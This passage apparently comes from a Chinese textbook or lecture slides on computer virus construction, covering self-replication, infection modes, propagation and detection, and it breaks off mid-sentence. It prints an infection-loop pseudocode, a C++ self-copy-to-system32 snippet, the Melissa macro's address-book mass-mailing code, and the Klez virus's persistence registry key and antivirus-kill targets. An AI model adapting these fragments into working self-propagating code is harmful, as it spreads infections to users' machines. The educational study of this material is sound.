搜索
2计算机病毒的构造本章开始深入讲解病毒的机理构造,是重点内容主要包括:2.1计算机病毒的自我复制2.2计算机病毒的感染机制2.3计算机病毒的传播机制2.4计算机病毒的伪装及变种功能2.1计算机病毒的自我复制•自我复制是计算机病毒的最重要特征,要阐述清楚它为什么具有了自我复制的功能----信息的数字化和可存储是基本;不同病毒的自我复制实现不同.•病毒的自我复制功能被绝大多数读者认为是病毒的最奇妙的技术。其实,信息的数字化和机器的拷贝功能是计算机病毒自我复制技术的基础,只不过复制不是由计算机用户操作完成,而是病毒本身来完成,下面将一一介绍。2.1计算机病毒的自我复制•2.1.1生物病毒和计算机病毒的复制比较•生物病毒的复制•生物病毒是一种生物实体,它能够使用细胞所具有的机制和物质对自己进行再制造,离开宿主它不能存在。•计算机病毒的复制•作为计算机病毒一般具有一下两个特征:•1.该段程序寄生于宿主程序中,宿主程序执行时,该段程序首先被执行。即具有寄生性。•2.该段程序能够自我复制到其他宿主程序中,即具有传染性。且被感染的程序运行时,病毒程序能够进一步感染其他目标程序,从而使病毒得到传播。能够进行自我复制计算机病毒的执行过程可以这样描述:•AtthebeginningisoneSRP---•/*PhaseI:INFECTIONProcess*/•A:.~Searchinagivendirectoryiffile.•.If(fileisfound)then•.If(fingerprintinfile)then•.Changetonextentryindirectory•.gotoA:•.else•.CopytheSRPcode:Theinfectedcodeof•hostmuststartbytheSearchfunctionanda•moveisneededtoavoidtooverwritingcode.•.Savepreinfectionentryofhost•.endif•.else•.Changedirectory•.gotoA:•.endif•/*Phase2:ACTIONProcess*/•.If(trigger)then•ACTIONprocess•.endif•.gotopreinfectionentryinhostprogram•---Now:anewSRP.•---Later...alotofSRP‘s.2.1.2计算机病毒自我复制示例•VC写的病毒自我传播的示例:•voidCMeCopyDlg::OnMeCopy()•{•//只所以写这类程序希望大家能明白的是病毒怎么感染和自我传播的,我会把它的各个功能写出来..•charsyspath[256]={0},pepath[256]={0};•interrsys=::GetWindowsDirectoryA(syspath,255);//获取系统路径;•interrpe=::GetCurrentDirectory(256,pepath);//获取当前路径;•//---------------这里是没有获取到路径时的处理-----------•/*...省略....*/•charpath[256]={0};•//------------------开始复制文件方法1-----------------------•charcomm[256]={0};•wsprintf(comm,xcopy/c/r/y%s\\mecopy.exe%s\\system32\\mecopy.exe,pepath,syspath);•//这里设定命令是不管什么只是复制...$_$...•wsprintf(path,系统路径:%s\n程序路径:%s\n拷贝命令:%s,syspath,pepath,comm);•MessageBox(path,GetPath:);•//system(comm);•//这种复制是用DOS复制的,回有个DOS闪烁一下!回被发现哦...•//另外一种复制方法:•charpath1[256]={0};•charpath2[256]={0};•wsprintf(path2,%s\\system32\\mecopy.exe,syspath);•wsprintf(path1,%s\\mecopy.exe,pepath);•intcpyerr=CopyFile(path1,path2,1);•if(cpyerr==0)•{MessageBox(CopyFileError!!);}•}2.1.2计算机病毒自我复制示•Melissa病毒的自我复制部分的代码片段如下:•IfUngaDasOutlook=“Outlook”Then•DasMapiName.Logon“profile”,”password”•Fory=1ToDasMapiName.AddressLists.Count•SetAddyBook=DasMapiName.AddressLists(y)•x=1•SetBreakUmOffASlice=UngaDasOutlook.CreateItem(0)•Foroo=1ToAddyBook.AddressEntries.Count•Peep=AddyBook.AddressEntries(x)•BreakUmOffASlice.Recipients.AddPeep•x=x+1•Ifx50Thenoo=AddyBook.AddressEntries.Count•Nextoo•BreakUmOffASlice.Subject=“ImportrantMessageFrom”&Application.UserName•BreakUmOffASlice.Body=“Hereisthatdocumentyouaskedfor...don’tshowanyoneelse;-)”•BreakUmOffASlice.Attachments.AddActiveDocument.FullName•BreakUmOffASlice.Send•Peep=“”•Nexty•DasMapiName.Logoff•EndIf2.1.3病毒自我复制的结构和模型•Cohen在1984年为计算机病毒提出了一个形式化的数学模型,这个模型使用图灵机。实际上Cohen的计算机病毒的形式化数学模型与Neumann的自我复制细胞自动机是十分像似的。从Neumann的角度,我们可以说计算机病毒就是一个可以自我复制的细胞自动机。病毒的自我复制结构程下面的金字塔型结构:2.1.3病毒自我复制的结构和模型图2.1病毒自我复制功能的金字塔型结构2.1.4基于自我复制功能的检测•病毒的自我复制的结构和描述有些类似于句子的生成,这是病毒的最根本的一个特征,即使其他的特征不明显,依据自我复制的特征就可以判别是否为病毒,因此本节介绍自我复制在病毒检测中方法和依据,详细而系统的病毒检测将在防治篇中介绍。病毒自我复制功能的检测类似文本的自动生成理论。前面对自我复制功能的描述就是一个有穷自动机的形式。2.1.4基于自我复制功能的检测在自我复制功能的检测过程中,所有的系统调用都被监视器截获,然后被发往复制检测模块,在这里包含了一整套不同的检测和过滤机制。图4.3.一场动作的检测算法2.2计算机病毒的感染机制•2.2.1计算机病毒感染机制的概述•2.2.2计算机病毒的目的及实现•2.2.3计算机病毒的传染方式•2.2.4一个典型病毒的源码(感染部分)剖析•2.2.5总结2.2.1计算机病毒感染机制的概述•大多数的病毒都会用如下的一段伪代码来检查某目标是否已被感染(复合的感染是相当明显的)。•BEGIN•IF(infectable_object_found)AND(object_not_already_infected)•THEN(infect_object)•END•下一步就是将病毒代码安装到可被感染的目标中,这可能需要一步或更多的操作来实现,其数目取决于病毒的类型。病毒代码安装的方式有:•在引导区中写入一段新代码。•将该代码附加于某个程序文件。•将宏代码附加于.doc文档。•将代码附加于标准系统程序,截断网络服务以便将与受感染文件相连的链接发送到被俘获的email地址中去。2.2.2计算机病毒的目的及实现•那么病毒在什么情况下被首次执行呢?•①染有引导型病毒的磁盘在启动计算机时(无论该磁盘是否是真正的DOS引导盘,是否真正将计算机启动成功),病毒被执行。•②文件型病毒在执行染毒EXE和COM文件时被执行。•③初始化批处理启动病毒。•④混合型病毒在以上几种情况下都被执行。2.2.3计算机病毒的传染方式•引导型感染:引导型病毒的代表有:Brain病毒,Stoned病毒等。•寄生感染:病毒将其代码放入宿主程序中,或者在头部或者在尾部亦或者在中部。•滋生感染:滋生感染式病毒又名伴侣病毒。•破坏性感染:1990年9月产于原西德的Numberone病毒,1991年12月产于加拿大的small38病毒就属于此类。•混合感染:既感染文件又感染主引导扇区或Boot扇区的混合感染病毒。•交叉感染:2.2.4一个典型感染剖析•“求职信”病毒是最早出现于2001年年底,相继出现了多个变种,专门攻击微软公司Outlook及OutlookExpress的弱点。由于此病毒多以求职为邮件内容,所以很容易迷惑用户,用户只要打开(甚至是预览)带有这种病毒的电子邮件,就能够导致病毒的发作。当病毒驻留系统后可能会强行关闭用户正在进行的正常操作,甚至会删除硬盘上的14种文档。•“求职信”病毒程序具有双程序结构,分为蠕虫部分(网络传播)和病毒部分(感染文件,破坏文件)。2.2.4一个典型感染剖析•当“求职信”病毒被激活后(用户打开或预览了带病毒的邮件),将按下列步骤对系统进行破坏。•1.安装木马•2.修改注册表•HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceWink***=wink***.exe•3.中止反病毒程序•ACKWIN32,ALERTSVC,AMON,ANTIVIR,……,NOD32,Norton,……等51个程序•4.繁殖•病毒将自身复制到本地硬盘、网络映射盘和局域网的共享硬盘上,复制的文件都具有双重扩展名,一般如下:•第一个后缀为:BAK、BAT、C、CPP、DOC、EXE、HTM、HTML、MP3、MP8、MPEG、MPQ、5.传播•经搜索到的邮件地址发送带病毒的电子邮件,发送的带毒附件的文件名格式和复制的文件名格式是一样的。6.修改可执行文件2.2.5总结•随着互联网的日益发展,计算机病毒的危害越来越大,计算机病毒的感染方式也愈来愈多。但病毒的最根本还是自我复制。在整个生命期中还采用了隐藏、加密、触发条件的手法,等等。本人对计算机病毒感染机制进行了叙述,但不尽详略。随着计算机病毒的防治愈加重要,对计算机病毒感染机制的研究也将更深入和广泛。2.3计算机病毒的传播机制•2.3.1计算机病毒的传播方式•2.3.2计算机病毒传播原理•2.3.3典型网络病毒传播源码分析•2.3.4通过移动存储介质传播的原理2.3.1计算机病毒的传播方式•2.3.1.1通过网络传播1通过网络的浏览和下载传播2通过电子邮件等传播3通过即时通讯软件传播4通过局域网传播5通过网页或软件等的漏洞进行传播•2.3.1.2通过移动存储介质传播•2.3.1.3其它传播方式2.3各种传播途径比例2.3.2计算机病毒传播原理•1蠕虫的目标定位•①收集电子邮件地址•②进行网络共享枚举攻击。•③网络扫描和目标指纹攻击。网络蠕虫能够扫描远程系统,他们使用预定义的网络地址类(指IP地址类)表产生随机的IP地址;随机扫描:蠕虫W32/Slammer。Slammer攻击UDP的1434(SQLserver)端口,它不检测IP地址是否有效。2.3.2计算机病毒传播原理•2感染传播•①攻击安装了后门的系统。有些蠕虫使用使用其